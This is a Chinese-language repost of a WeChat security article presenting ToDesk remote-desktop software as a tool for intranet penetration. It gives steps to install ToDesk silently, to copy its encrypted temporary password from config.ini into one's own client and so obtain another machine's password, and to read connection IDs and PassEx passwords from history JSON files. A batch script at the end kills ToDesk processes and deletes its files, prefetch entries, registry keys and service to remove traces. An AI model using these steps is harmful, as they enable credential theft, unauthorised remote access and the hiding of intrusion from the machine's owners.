ps:我想todesk这款远程连接的软件,就不用向大家介绍了吧,大家py经常用到的
漏洞的起因还是从Todesk支持静默安装开始
ToDesk_Setup.exe的/S参数可以实现静默安装
ToDesk_Setup.exe /S //官方给的静默安装,可以到达绕过的效果
C:Program Files (x86)ToDesk //默认安装在以下目录中
安装完成后自动运行。
在 C:"Program Files (x86)"ToDesk 的路径下会有一个config.ini文件,这个文件里面有着连接ToDesk的临时密码。
对于加密的密码我们可以复制到本地的todesk配置文件
里,替换我们本地的密码,然后重新打开todesk,这样就能得倒对方机器的连接密码。
使用本机的临时密码登录即可。
ToDesk连接一台主机后会在默认安装目录下生成一个json格式文件
C:Program Files (x86)ToDeskuserInfo.json //未登录状态
C:Program Files (x86)ToDeskdevlist_293***548@qq.com.json //登录状态
这个文件主要用来保存历史的连接记录。首先,你需要找到UserId的连接ID和PassEx密码。接着,使用这些信息解密PassEx以获取明文。最后,用目标主机ToDesk的连接ID和密码建立连接。
{
"DeviceInfo" : [
{
"Height" : 723,
"LastPath" : "",
"PassEx" : "77075*******0ab54fee1e13935e5392771c24c418a6d526e3ab83ef578d215ebd87467876fd7f55312fb8dbbe9c478e35da8a3069a2",
"PrivacyScreen" : 0,
"Quality" : 0,
"ResolutionX" : 0,
"ResolutionY" : 0,
"ScreenMode" : 0,
"UserId" : "767***368",
"Voice" : 0,
"Width" : 1368
}
]
}
最后清除痕迹的一步
@echo off
taskkill /f /im ToDesk_Lite.exe /im ToDesk_Service.exe /im ToDesk.exe
del /s /q C:WindowsPrefetchTODESK*.pf
del /s /q C:UsersPublicDesktopToDesk.lnk
del /s /q "%userprofile%AppDataRoamingMicrosoftWindowsRecent*TODESK*.lnk"
rmdir /s /q "C:Program Files (x86)ToDesk"
rmdir /s /q "C:ProgramDataMicrosoftWindowsStart MenuProgramsToDesk"
rmdir /s /q "%userprofile%AppDataLocalToDesk"
rmdir /s /q "C:WINDOWSSysWOW64configsystemprofileAppDataLocalToDesk"
reg delete "HKLMSOFTWAREToDesk" /f
reg delete "HKLMSYSTEMCurrentControlSetServicesToDesk_Service" /f
reg delete "HKLMSOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionUninstallToDesk" /f
sc delete ToDesk_Service
[...SNIP...]
结束散会!!!
原文始发于微信公众号(月落安全):你不得不学习的手法 — ToDesk 内网渗透
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论